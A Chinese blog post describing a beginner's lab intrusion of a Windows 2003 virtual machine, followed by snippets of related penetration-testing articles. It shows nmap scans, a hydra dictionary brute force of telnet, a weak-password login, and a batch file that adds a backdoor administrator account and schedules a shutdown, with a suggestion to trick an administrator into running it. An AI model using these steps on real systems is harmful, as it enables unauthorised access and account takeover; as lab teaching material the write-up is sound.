内网渗透(telnet爆破)

最新推荐文章于 2025-04-01 16:06:09 发布
最新推荐文章于 2025-04-01 16:06:09 发布
阅读量5k 收藏 19
点赞数 4
分类专栏: 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/117854834
版权

文章目录

前言

第一次渗透实验

攻击机虚拟机kali:192.168.241.140

目标机虚拟机win 2003:192.168.241.130

一、内网信息侦察

在毫无顾虑地情况下,可以直接发掘网段内存活主机

nmap -sP 192.168.241.0/24

(这里建议使用 -p0 可以绕过某些防火墙)

请添加图片描述
这里对192.168.241.130的主机进行渗透

nmap -sV 192.168.241.130

对该主机进行端口扫描(可加-Pn 无ping扫描)

请添加图片描述
机型为win 2003,我直接对telnet进行爆破

二、telnet渗透

1.hydra

命令如下(示例):

hydra 192.168.241.130 -L user.txt -P pwd.txt telent

双字典爆破
请添加图片描述
这不有手就行?(

2.telnet远程登陆

命令如下(示例):

telnet 192.168.241.130
login:administrator
password:123

成功登入shell
请添加图片描述

三、提权

假如能直接登入管理员账号,那是最理想的情况,但没有的话,只能想方设法提权(社工,诱导等)。

C:\>whoami 

C:\>net user //查询存在用户名

C:\>copy con c:\123.bat
net user qq 111 /add
net localgroup administrator qq /add
shutdown -s -t 40 -c "1111"

这里在c盘目录写了个123的批处理文件,内容为创建qq这个用户,并升级为管理员用户,以及40s关机(关机写着玩的)
我们可以设法让管理员运行

请添加图片描述
预防:密码不要太简单、关闭不常用端口、尽量减少设备用户名、不运行来历不明的文件

总结

一个很简单的渗透实验,暑假闲来无事随便写写

内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
08-18 1982
实战|手把手教你如何进行内网渗透 x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关
红队内网攻防渗透内网渗透之Windows内网信息收集:内网和域
HACKONE的博客
04-10 618
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内网中通常会部署大量的网络安全设备例如IDSIPS日志审计安全网关反病毒等在域网络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
Telnet暴力破解
Myu_wzy的博客
10-01 2122
一、实验环境 目标主机: Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 二、实验过程 进入Metasploit:msfconsole 使用登录模块:use auxiliary/scanner/telnet/telnet_login 设置模块参数 show options set rhosts192.168.20.143#设置靶机ip set threads 10 #设置线程数为10...
telnet 弱口令爆破 菜刀提权
qq_56889067的博客
11-15 7944
第一题、使用2.txt密字典、爆破test用户的密码 使用nmap -sV 扫描目标靶机 IP 获取 靶机开启的端口及服务的版本信息。 发现开启的有22、23 端口及服务。这里我们使用 telnet服务进行爆破、使用msfconsole打开永恒之蓝。 使用search telnet_login 查看 telnet爆破模块。 使用use 调用 此模块,接着在模块内使用命令options查看需要配置的参数。 接下来配置参数RHOSTS目标IP,PASS_FILE 密码字典,USE...
TELNET远程访问协议攻防
最新发布
weixin_65200435的博客
04-01 306
(1)200301设定管理员账号administrator密码为123,并开启TELNET服务(开始-管理工具-服务-Telnet-右击属性-启动类型改为自动)VMNET0网段设置为桥接模式;从XP02上开启P2P控制XP01(系统设置-高级选项-控制设置-通过监测ARP请求发现新主机-扫描后选择XP01-启动控制)、记录XP01、XP02、200301的MAC地址:命令ipconfig/all;(4)使用ethereal分析TCP的三次握手过程,并识别telnet的用户名和密码。
口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解
薛定谔的猫
04-12 6880
用户可以通过输入用户名和密码来登录数据库服务器。输入如下命令:exec master.dbo.xp_cmdshell 'ipconfig',再输入go,可以发现ipconfig成功执行,获取目标操作系统的ip信息。开启kali-linux虚拟机,打开命令行窗口运行NMAP,输入命令nmap -v -A -Pn 193.168.1.24,对该IP地址进行扫描。在本机打开命令行,输入mysql -h 193.168.1.38 -u root –p,输入密码admin888,尝试登录mysql服务器。
渗透实战:内网渗透
热门推荐
kali_Ma的博客
11-22 3万+
前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。 网络拓扑如下: web服务器 先来波端口扫描: 直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web
telnet爆破
qq_54713392的博客
05-09 362
telnet爆破 利用msf中的telnet_login模块对metasploitable的ssh服务实施爆破攻击 在kali里启动msf 使用search查询telent_login模块,然后使用use调用该模块 设置连接metasploitable的ip地址,使用set rhosts ip地址 设置用户名和密码文件 Run实行爆破 ...
Telnet爆破提权
佐安
03-18 3369
准备环境: 搭建一台kali和一台Linux即可测试成功 攻击主机:192.168.1.166 被攻击主机:192.168.1.167 在攻击主机中首先利用nmap进行端口扫描,看下被攻击主机是否开启telnet 利用kali进行telnet爆破: 在kali中利用msfconsole进行破解登录telnet 配置好之后然后输入run进行爆破,以下是爆破结果 然后使用se...
内网渗透流程与思路和工具讲解
04-10
内网渗透流程与思路和工具讲解 内网渗透测试是一个复杂的过程,需要了解目标网络的结构、系统配置、软件版本、开放端口等信息。以下是内网渗透测试的流程和思路: 1. 内网信息收集 在内网渗透测试中,信息收集是...
内网渗透基础总结
wulanlin的博客
01-06 2430
研究内网安全我们首先需要弄明白内网是什么?在渗透测试过程中我们一般把因特网称为外网,而将其余的网络(政务网、公安网、企业内网等)定义为内网。后来我仔细思考了一下,内外网的概念其实是相对而言的,比如一台电脑同处于办公室内的小型局域网和公司的大型局域网内,那么就可以把办公室内的局域网称为内网,公司的大型局域网称为外网。而通常情况下我们会同处于公司网和因特网之内,那么就会常常把因特网称为外网,公司网称为内网,久而久之这种概念也就形成了。内网相对于外网来说通信更快、传输文件更方便、共享更便利,但是相对来说安全性也更
telnet 密码破解
05-06
可以对网络设备的telnet密码进行在线破解,适用于经常忘密码的网管。
Telnet-crack:Telnet——破解(python)
05-26
Telnet-crack Telnet——crack (python) 本程序由Xfree团队编写 转载请说明出处 windows下测试通过 可破解windows,linux,H3C路由器, 理论上也可破解root后的安卓手机,但是未测试 注意字典最后一行不要有换行,不然会进入死循环 编程技术还是有待长进啊 写这个程序把我累死了。 印度阿三能写的东西,我不照样搞出来了么。 风炫 2015年5月8日
内网渗透工具与流程.pptx
04-10
内网渗透测试是一种网络安全评估方法,用于检测组织内部网络的安全性。这个过程通常由安全专家进行,目的是发现并修复潜在的漏洞,防止未经授权的访问和攻击。以下是对内网渗透流程和工具使用的详细说明: 首先,...
入门渗透telnet远程登入——Meow
栉风沐雪的博客
01-30 967
本文为入门级渗透测试,在hackthebox平台使用相关靶机,以kali作为攻击机进行演示。在登入telnet时可以发现该靶机的系统为linux,所以接下来使用的指令都是linux相关的。telnet需要用户和密码登入,但是有时候会因为程序员的失误没有设置登入密码(如此靶机)由于一般未知目标开放了哪些端口运行了哪些协议扫描时要扫描所有端口。因为用的是kali的攻击机所以在此使用nmap脚本进行扫描。如图可以发现目标机器的23端口上运行着telnet
渗透测试学习笔记一 Telnet(HTB Meow)
Rick66Ashley的博客
10-26 234
1.首先要开始渗透测试,就必须让攻击机和靶机连在同一网络上,一般使用openVPN,将攻击机和靶机都连在VPN服务器上,形成一个虚拟网络。2.连接成功以后,首先对靶机进行ping测试。注意区分靶机的IP和VPN服务器的IP,成功连接到靶机,然后看看登录什么用户,最后发现root没有设置密码,空白密码登录。5最后ls命令发现flag之后cat flag.txt,case closed。基础知识:1 VM=virtual machine虚拟机。3与靶机的连接通过openvpn提供的vpn服务。
hydra对批量IP进行telnet爆破弱口令
gghwcf的专栏
06-21 1万+
hydra对批量IP地址进行telnet爆破,发现网上的资料都很老,没法使用,我现在hydra的版本是8.6.经测试可以正常使用的命令是:hydra -s 23 -V -l admin -p admin -t 16 -M IP地址目录 telnet...
Telnet弱口令渗透测试
旺仔Sec&blog
09-22 4746
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。
简单的内网渗透实验
weixin_30732825的博客
06-12 352
本机win10  192.168.1.109 虚拟机win7  NAT模式  192.168.1.131 攻击机:虚拟机kali  仅主机模式  192.168.10.128 假设攻击机kali已经对win10主机getshell 1.kali生成一个exe木马文件test.exe(这是最简单的木马文件,有杀软就会被杀,若要免杀还要做免杀处理) msfvenom -p window...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值